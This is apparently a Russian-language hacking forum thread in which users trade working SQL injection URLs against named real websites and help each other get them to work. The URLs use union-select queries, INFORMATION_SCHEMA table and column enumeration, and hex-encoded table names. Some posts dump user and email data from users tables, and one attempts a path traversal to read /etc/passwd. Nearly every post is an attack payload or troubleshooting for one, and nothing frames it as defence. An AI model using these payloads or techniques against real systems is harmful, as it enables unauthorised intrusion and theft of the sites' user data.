А дальше http://runnercat.org.ua/page.php?id=-13172+union+select+1+-- и "you are bannded Dear mr Cracker" =)))
Ребят помогите развести вот такую тему че то дальше не смог никуда пойти. http://www.asipartner.com/pr.asp?ID=78+or+1=@@version-- 'Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86) Feb 26 2008 18:15:01 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.asipartner.com/pr.asp?ID=78+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- ExpireNewSKU http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bchar(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(119)%2Bchar(83)%2Bchar(75)%2Bchar(85)))-- QUESTIONS http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bchar(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(119)%2Bchar(83)%2Bchar(75)%2Bchar(85),char(81)%2Bchar(85)%2Bchar(69)%2Bchar(83)%2Bchar(84)%2Bchar(73)%2Bchar(79)%2Bchar(78)%2Bchar(83)))-- ANSWERS и т.д. https://forum.antichat.ru/thread30501.html
здраствуйте отправили меня в этот топик вот сдаюсь помогите пожалуйста http://www.pitchsidemanager.com/club.php?stid=-1294' http://www.pitchsidemanager.com/profile.php?smid=-1' http://www.pitchsidemanager.com/player_profile.php?pid=-3406'
Наверно нужно быть зарегенным что-бы увидеть... http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00
Вот: Code: http://www.pitchsidemanager.com/club.php?stid=-1294'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+
улыбнуло Спасибо всем ! значит просто я поля не так подбирал ... вот еще одна незадача. motion-twin.com/blog/month?m=10001' 1. Когда подставляю -10001' ошибка не выползает , но что бы выползла - не получается 2. Если выполнить такой запрос -1'/* ошибка показывается вот с такой фишкой , где меняется дата SELECT BlogEntry.* FROM BlogEntry LEFT JOIN BlogCategory ON BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '-1'/-*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC' at line 1 3 . Если убрать минус то получится 1'/* то выдает date.c(104) : Invalid date format : 1-00-01 4 .Попбробовал -1-00-01'/* Календарь показал : Zero -1 Lu Ma Me Je Ve Sa Di 1 2 3 4 5. (если -10 то ивалид date , если -100,-200 etc то на календаре меняется Zero -100, -200) 6 . Все что ниже 10000 = ошибка 7. А вот когда делаю запрос m=999999'+order+by+1/* на календаре теперь null 9999 Lu Ma Me Je Ve Sa Di 1 2 3 4 (на заметку : отображаются только числа 1,2.3.4 на каледнаре из 31) 8 . Пробовал 25-02-05' или 25-02-05 для примера показывает February 25 9. когда -25-02-05 выдает date.c(104) : Invalid date format : -25-02-01 10 . когда 1'+order+by+1/* выдает ошибку где вместо 0000 видно такое BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '1' o-rd-01' AND cdate <= '1' o-rd-31' ORDER BY =
просто спросил....вот у меня нет брута..хотел узнать где взял. Мужики, а как узнать количество столбцов,когда Code: http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%2011%20-- показывает не полный вывод страницы..но вывод,а Code: http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%205%20-- полный так как order by 12 воще ничего не выводит и в том и в том случае не видно названия столбцов (-)пробовал и ещё вопрос,если при вставлянии кавычки перебрасывает на главную, это скуль? Если да,тот остановить переброс? Вот пример: Code: http://sinelnikovo.org.ua/viewpage.php?page_id=21' а вот ещё вопросег,есть скуль: Code: http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321%20order%20by%2032%20-- а при union select перебрасівает на главную
TELO 1 колонка скуля есть подбирай поля в ручную... перебрасывает изза того что запрос не верный ) скули нет x311 хмм чтото не понятное) может просто ругается на неправильную дату?
Подобрал примерные таблицы (14 полей) Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!) Code: http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='ibf_profile_portal'+limit+1,1-- Не выводиться =\ я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю) вообщемс помогите что у меня не так в запросе
название таблички в hex 0xHExназваниетаблицЫ у тебя будет Code: http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,12,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6962665f70726f66696c655f706f7274616c+limit+1,1--
Есть сайт так вот при подборе полей ниче не выводиться а когда подставляю id=1' то ошибка есть(еррор синтаксис)! Мб кто знает? Пробывал и так подобрать id=1'+union+select+1,2-- (и т.д.) все равно ошибка Mysql (причем в синтаксисе и перебрал я так до 20 полей) а если убрать ' то ниче не выводиться как я говорил
http://www.brockport.edu/athletics/baseball/index.php?id=-432'+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Code: http://www.brockport.edu/athletics/baseball/index.php?id=432'+and+substring(@@version,1,1)=4/* 4-ая ветка
Ребята, подскажите: Что-то не пойму: Вывожу данные: =-6285+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(user,0x3a,email),12+from+users-- Выводит какое-то количество данных, пробую лимитом "user": =-6285+union+select+1,2,3,4,5,6,7,8,9,10,user,12+from+users+limit+1,1-- Данные не выводятся: Пробую просто concat - тоже самое, а также _ws - тоже ничего не хочет выводить... В чем косяк?
